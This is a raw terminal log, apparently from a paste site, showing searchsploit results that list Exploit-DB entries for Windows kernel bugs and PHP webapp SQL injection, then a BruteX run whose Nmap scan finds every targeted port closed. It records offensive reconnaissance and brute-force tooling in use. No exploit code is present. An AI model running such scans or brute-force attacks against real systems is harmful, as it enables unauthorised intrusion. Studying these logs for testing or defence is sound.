- [01;31m[KMicrosoft[m[K Windows - nt!SeObjectCreateSaclAcc | windows/dos/14670.txt
- [01;31m[KMicrosoft[m[K Windows 7 Kernel - Pool-Based Out- | windows/dos/42009.txt
- [01;31m[KMicrosoft[m[K Windows Kernel - 'ATMFD.DLL' Out-o | windows/dos/42243.txt
- [01;31m[KMicrosoft[m[K Windows Kernel - NtGdiGetTextExten | windows/dos/39648.txt
- [01;31m[KMicrosoft[m[K Windows Kernel - Registry Hive Loa | windows/dos/40766.txt
- [01;31m[KMicrosoft[m[K Windows Kernel - win32k.sys '.TTF' | windows/dos/42744.txt
- [01;31m[KMicrosoft[m[K Windows Kernel - win32k.sys .TTF F | windows/dos/42746.txt
- [01;31m[KMicrosoft[m[K Windows Media Services 4.0/4.1 - H | windows/dos/19759.c
- [01;31m[KMicrosoft[m[K Windows Server 2008/2012 - LDAP Ro | windows/dos/40703.pl
- [01;31m[KMicrosoft[m[K Word 2007/2010/2013/2016 - Out-of- | windows/local/40224.txt
- [01;31m[KMicrosoft[m[K Works 8.0 Sprea[01;31m[Kds[m[Kheet - Multiple V | windows/dos/28222.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- Apple WebKit - 'Form[01;31m[KSubmission[m[K::create' Use- | multiple/dos/41811.html
- Free Article [01;31m[KSubmission[m[Ks 1.0 - SQL Injection | php/webapps/35492.txt
- NVIDIA Driver 375.70 - Buffer Overflow in Co | windows/dos/41365.txt
- PHP-Nuke News [01;31m[KSubmission[m[K Story - Text Field | php/webapps/27060.txt
- WordPress Plugin Resume [01;31m[KSubmission[m[Ks & Job Po | php/webapps/19791.txt
- --------------------------------------------- ----------------------------------
- [92m + -- ----------------------------=[Running Brute Force]=--------------------- -- +[0m
- [91m __________ __ ____ ___[0m
- [91m \______ \_______ __ ___/ |_ ____ \ \/ /[0m
- [91m | | _/\_ __ \ | \ __\/ __ \ \ / [0m
- [91m | | \ | | \/ | /| | \ ___/ / \ [0m
- [91m |______ / |__| |____/ |__| \___ >___/\ \ [0m
- [91m \/ \/ \_/[0m
- [91m + -- --=[BruteX v1.7 by 1N3[0m
- [91m + -- --=[http://crowdshield.com[0m
- [92m################################### Running Port Scan ##############################[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 06:56 EDT
- Nmap done: 1 IP address (1 host up) scanned in 4.20 seconds
- [92m################################### Running Brute Force ############################[0m
- [91m + -- --=[Port 21 closed... skipping.[0m
- [91m + -- --=[Port 22 closed... skipping.[0m
- [91m + -- --=[Port 23 closed... skipping.[0m
- [91m + -- --=[Port 25 closed... skipping.[0m
- [91m + -- --=[Port 80 closed... skipping.[0m
- [91m + -- --=[Port 110 closed... skipping.[0m
- [91m + -- --=[Port 139 closed... skipping.[0m
- [91m + -- --=[Port 162 closed... skipping.[0m
- [91m + -- --=[Port 389 closed... skipping.[0m
- [91m + -- --=[Port 443 closed... skipping.[0m
- [91m + -- --=[Port 445 closed... skipping.[0m
- [91m + -- --=[Port 512 closed... skipping.[0m
- [91m + -- --=[Port 513 closed... skipping.[0m
- [91m + -- --=[Port 514 closed... skipping.[0m
- [91m + -- --=[Port 993 closed... skipping.[0m
- [91m + -- --=[Port 1433 closed... skipping.[0m
- [91m + -- --=[Port 1521 closed... skipping.[0m
- [91m + -- --=[Port 3306 closed... skipping.[0m
- [91m + -- --=[Port 3389 closed... skipping.[0m
- [91m + -- --=[Port 5432 closed... skipping.[0m
- [91m + -- --=[Port 5900 closed... skipping.[0m
- [91m + -- --=[Port 5901 closed... skipping.[0m
- [91m + -- --=[Port 8000 closed... skipping.[0m
- [91m + -- --=[Port 8080 closed... skipping.[0m
- [91m + -- --=[Port 8100 closed... skipping.[0m
- [91m + -- --=[Port 6667 closed... skipping.[0m
- #######################################################################################################################################
Add Comment
Please, Sign In to add comment